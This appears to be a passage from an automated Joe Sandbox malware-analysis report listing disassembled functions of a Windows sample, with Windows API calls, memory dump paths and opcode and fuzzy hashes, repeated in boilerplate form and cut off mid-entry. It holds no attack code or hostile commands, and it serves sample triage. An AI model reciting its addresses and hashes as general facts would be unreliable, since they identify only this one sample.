                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend_wcslen
                                    • String ID:
                                    • API String ID: 455545452-0
                                    • Opcode ID: fb56a7781700b589439344146519f4d340fe6d7c98bfc8e890467288451ed050
                                    • Instruction ID: 9909add7851b62a3325b9ad4f2f8bc8f417eb573a540ee12c8c1b8e4de33b7b9
                                    • Opcode Fuzzy Hash: fb56a7781700b589439344146519f4d340fe6d7c98bfc8e890467288451ed050
                                    • Instruction Fuzzy Hash: EC1106B1600608E6DF209F65CC85AEE7B6CFF91764F10412AF915D6181E774C9C0CB65
                                    Function 007B1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eb2c8d13d3dd73fb03dc46de0940b74cf000d2496e7651d31edbc612ac3c952d
                                    • Instruction ID: 8f45b635760a5966f5fae50b3eeb6a8f55e4620b26e6011b802bc3cf68b1d459
                                    • Opcode Fuzzy Hash: eb2c8d13d3dd73fb03dc46de0940b74cf000d2496e7651d31edbc612ac3c952d
                                    • Instruction Fuzzy Hash: C401D1B230A61ABEF62126786CD4FE7671CEF417B8FB10325F521A11D2DB68DC005670
                                    Function 007E1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007E1A47
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007E1A59
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007E1A6F
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007E1A8A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 2f777878dea2a6952e4f0d4e80d927d97cde30edf9ba5138b067c66fe01add57
                                    • Instruction ID: c20a34cda3f16b56394fa9c27af322be488568b297cb03cfffa1332bae2acd81
                                    • Opcode Fuzzy Hash: 2f777878dea2a6952e4f0d4e80d927d97cde30edf9ba5138b067c66fe01add57
                                    • Instruction Fuzzy Hash: 8D113C3AD01219FFEB10DBA9CD85FADBB78FB08750F6040A1E600B7290D6716E50DB94
                                    Function 007EE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 007EE1FD
                                    • MessageBoxW.USER32(?,?,?,?), ref: 007EE230
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007EE246
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007EE24D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2880819207-0
                                    • Opcode ID: 2691573cc647a1c63b0b0e762d9ba55de5cfe6a7292d8498aa29a64a64726abf
                                    • Instruction ID: 2f475e2b977ddc9b403803c84883da30973709e9cc3f27cb182dfbc2abf4c626
                                    • Opcode Fuzzy Hash: 2691573cc647a1c63b0b0e762d9ba55de5cfe6a7292d8498aa29a64a64726abf
                                    • Instruction Fuzzy Hash: D7110476904254BBCB019FA9AC09BEE7FADBF49321F008615F924E3390D3B88D0487A0
                                    Function 007AD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,?,007ACFF9,00000000,00000004,00000000), ref: 007AD218
                                    • GetLastError.KERNEL32 ref: 007AD224
                                    • __dosmaperr.LIBCMT ref: 007AD22B
                                    • ResumeThread.KERNEL32(00000000), ref: 007AD249
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                    • String ID:
                                    • API String ID: 173952441-0
                                    • Opcode ID: 6e61789e1661f7d38d6f895a41b58072d7433a2e10e3ef624df002803e3a4a9c
                                    • Instruction ID: 5e4e691ffeccad53a604a9a779ef44a3cf75b73fbe0c7a2788385a3410c5e66c
                                    • Opcode Fuzzy Hash: 6e61789e1661f7d38d6f895a41b58072d7433a2e10e3ef624df002803e3a4a9c
                                    • Instruction Fuzzy Hash: B201C076845208BBCB216BA5DC09BAE7A6DFFC3331F104329F926925D0DB788D01C6A0
                                    Function 0078600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0078604C
                                    • GetStockObject.GDI32(00000011), ref: 00786060
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0078606A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateMessageObjectSendStockWindow
                                    • String ID:
                                    • API String ID: 3970641297-0
                                    • Opcode ID: 26cc5dd4b83cee17cb3c2f2ba1b9d4bf6f482c5fdccea46ca964704cf9b33600
                                    • Instruction ID: 01b1b2818e3ef2e1b5254b24ca18835a5caf6cd1ab7b083a1b0ad515e177b633
                                    • Opcode Fuzzy Hash: 26cc5dd4b83cee17cb3c2f2ba1b9d4bf6f482c5fdccea46ca964704cf9b33600
                                    • Instruction Fuzzy Hash: 4D11AD72141508BFEF125FA48C44EEABBADFF083A4F004205FA0452110C73ADC60DBA0
                                    Function 007A3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 007A3B56
                                      • Part of subcall function 007A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 007A3AD2
                                      • Part of subcall function 007A3AA3: ___AdjustPointer.LIBCMT ref: 007A3AED
                                    • _UnwindNestedFrames.LIBCMT ref: 007A3B6B
                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 007A3B7C
                                    • CallCatchBlock.LIBVCRUNTIME ref: 007A3BA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                    • String ID:
                                    • API String ID: 737400349-0
                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                    • Instruction ID: a99618d51fed467c3260177f421012e61429e79da9a3cbbeca9b1c23bf162a5d
                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                    • Instruction Fuzzy Hash: 42016972100148BBCF125E95CC46EEB7F6AEFCA754F044204FE0856121C33AE961DBA0
                                    Function 007B3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007813C6,00000000,00000000,?,007B301A,007813C6,00000000,00000000,00000000,?,007B328B,00000006,FlsSetValue), ref: 007B30A5
                                    • GetLastError.KERNEL32(?,007B301A,007813C6,00000000,00000000,00000000,?,007B328B,00000006,FlsSetValue,00822290,FlsSetValue,00000000,00000364,?,007B2E46), ref: 007B30B1
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007B301A,007813C6,00000000,00000000,00000000,?,007B328B,00000006,FlsSetValue,00822290,FlsSetValue,00000000), ref: 007B30BF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 03d05d03069feefac0b0f00ef3561a5ba73c382fc5f9e1e595ddbf79e7d74943
                                    • Instruction ID: 797b288a9797f122e05be290095f4e67d25c04fef3364a746555dff987af6a6c
                                    • Opcode Fuzzy Hash: 03d05d03069feefac0b0f00ef3561a5ba73c382fc5f9e1e595ddbf79e7d74943
                                    • Instruction Fuzzy Hash: 9701F736745336ABCB315B78AC44BD77B9EBF05B61B204720F906E3180CB29D981C6E0
                                    Function 007E7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 007E747F
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007E7497
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007E74AC
                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007E74CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Type$Register$FileLoadModuleNameUser
                                    • String ID:
                                    • API String ID: 1352324309-0
                                    • Opcode ID: 9a85aeb4159094ee637f9f5e1620880f0a2db3687e2681a702f0f197e0d8ed3b
                                    • Instruction ID: d824896ba8ce81c96e409e42acd730b47e8a354b19762c28866f2ace1347186b
                                    • Opcode Fuzzy Hash: 9a85aeb4159094ee637f9f5e1620880f0a2db3687e2681a702f0f197e0d8ed3b
                                    • Instruction Fuzzy Hash: 0C1104B124A394AFE3248F15DC08F927FFCFF04B00F108069A616D6091D774E904DB90
                                    Function 007EB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,007EACD3,?,00008000), ref: 007EB0C4
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,007EACD3,?,00008000), ref: 007EB0E9
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,007EACD3,?,00008000), ref: 007EB0F3
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,007EACD3,?,00008000), ref: 007EB126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    • Opcode ID: deff8cdb7039e37b6442080c722ee58466c5041872f2a71f89fd60d4a4ecbd71
                                    • Instruction ID: a69aa312462affca6d867b9c0fab57e54b75fac245cc16d515219985c092e4fe
                                    • Opcode Fuzzy Hash: deff8cdb7039e37b6442080c722ee58466c5041872f2a71f89fd60d4a4ecbd71
                                    • Instruction Fuzzy Hash: 48112731C4266CE7CF00AFE6E9986EEBF78BF0D721F108086D941B2181CB3896509B51
                                    Function 007E2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 007E2DC5
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007E2DD6
                                    • GetCurrentThreadId.KERNEL32 ref: 007E2DDD
                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 007E2DE4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: 17329d3d4b4d4eea059cf37c3220bdd8fb3492397140ff167c9545e73b9319d3
                                    • Instruction ID: 48714b4c37447eb608282f0e0552e3a279dad303e1ec4ea16d911967c554f7c3
                                    • Opcode Fuzzy Hash: 17329d3d4b4d4eea059cf37c3220bdd8fb3492397140ff167c9545e73b9319d3
                                    • Instruction Fuzzy Hash: 07E012B16822247BD7205B739C0DFEB7E6CFF56BA1F404119F606D1091DAA5C941C6B1
                                    Function 00818863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00799639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00799693
                                      • Part of subcall function 00799639: SelectObject.GDI32(?,00000000), ref: 007996A2
                                      • Part of subcall function 00799639: BeginPath.GDI32(?), ref: 007996B9
                                      • Part of subcall function 00799639: SelectObject.GDI32(?,00000000), ref: 007996E2
                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00818887
                                    • LineTo.GDI32(?,?,?), ref: 00818894
                                    • EndPath.GDI32(?), ref: 008188A4
                                    • StrokePath.GDI32(?), ref: 008188B2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: dbe996e384aeda16afc7b233027bd4a7694a84291d95210256b50b18e9c34d51
                                    • Instruction ID: 3a1e6af6db2f9787626c57611f0dc999d98c5a36387dce305f737ceeb288b8a5
                                    • Opcode Fuzzy Hash: dbe996e384aeda16afc7b233027bd4a7694a84291d95210256b50b18e9c34d51
                                    • Instruction Fuzzy Hash: 1BF03A36081658FAEB125F94AC0EFCA3F5DBF0A311F448000FA11650E1C7795551CBE9
                                    Function 007998B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 007998CC
                                    • SetTextColor.GDI32(?,?), ref: 007998D6
                                    • SetBkMode.GDI32(?,00000001), ref: 007998E9
                                    • GetStockObject.GDI32(00000005), ref: 007998F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Color$ModeObjectStockText
                                    • String ID:
                                    • API String ID: 4037423528-0
                                    • Opcode ID: a8e9397fc3391d3b6e06922f954a3f1eaea0b008fc83ca48414ab9794b764e15
                                    • Instruction ID: 67350ba73f121088e9dd692e0dbd26ece6f713a092722d8769adc5b3bba18e28
                                    • Opcode Fuzzy Hash: a8e9397fc3391d3b6e06922f954a3f1eaea0b008fc83ca48414ab9794b764e15
                                    • Instruction Fuzzy Hash: 34E06D312C4280BAEB215B78BC09BE83F25BF12336F14C21AF6FA580E1C3754650DB11
                                    Function 007E162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 007E1634
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,007E11D9), ref: 007E163B
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007E11D9), ref: 007E1648
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,007E11D9), ref: 007E164F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: 41e32a012f99aa1bd7644bdee5fcfd6ae39aa97fccf98e0279b0d9aad16c8945
                                    • Instruction ID: fe90d24d25f3e753082799f09f701bc83dccbaf4ad98bb83bac7e1bb443d1845
                                    • Opcode Fuzzy Hash: 41e32a012f99aa1bd7644bdee5fcfd6ae39aa97fccf98e0279b0d9aad16c8945
                                    • Instruction Fuzzy Hash: 0BE08631642211DBD7201FA2AD0DBC67B7CBF48791F14C808F245C9080DA384580C750
                                    Function 007DD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 007DD858
                                    • GetDC.USER32(00000000), ref: 007DD862
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007DD882
                                    • ReleaseDC.USER32(?), ref: 007DD8A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: f50bfddc2596d1244643a8222322263e03031ed86909edc5b6e7e2fadaefb28f
                                    • Instruction ID: 00d252cf57bf457f2e4ccf262b513876d5e1e5f2007ac363d72aa85515d02e8e
                                    • Opcode Fuzzy Hash: f50bfddc2596d1244643a8222322263e03031ed86909edc5b6e7e2fadaefb28f
                                    • Instruction Fuzzy Hash: A8E01AB5840204EFCF51AFA0D80C6ADBBB9FF18310F14D009E84AE7250C7384941AF50
                                    Function 007DD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 007DD86C
                                    • GetDC.USER32(00000000), ref: 007DD876
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007DD882
                                    • ReleaseDC.USER32(?), ref: 007DD8A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 2024c53ba7a9f0db550b5a3e8863bbb99ea502540a1466184e1156e86fc6300f
                                    • Instruction ID: c3b6ac6973c7efed6e79349cadf5f86357307e35d790120d7cea63b5867d323f
                                    • Opcode Fuzzy Hash: 2024c53ba7a9f0db550b5a3e8863bbb99ea502540a1466184e1156e86fc6300f
                                    • Instruction Fuzzy Hash: B2E092B5C80204EFCF51AFA5E80C6ADBBB9BF18311F149449E94AE7250DB385A41AF50
                                    Function 007F4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00787620: _wcslen.LIBCMT ref: 00787625
                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 007F4ED4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
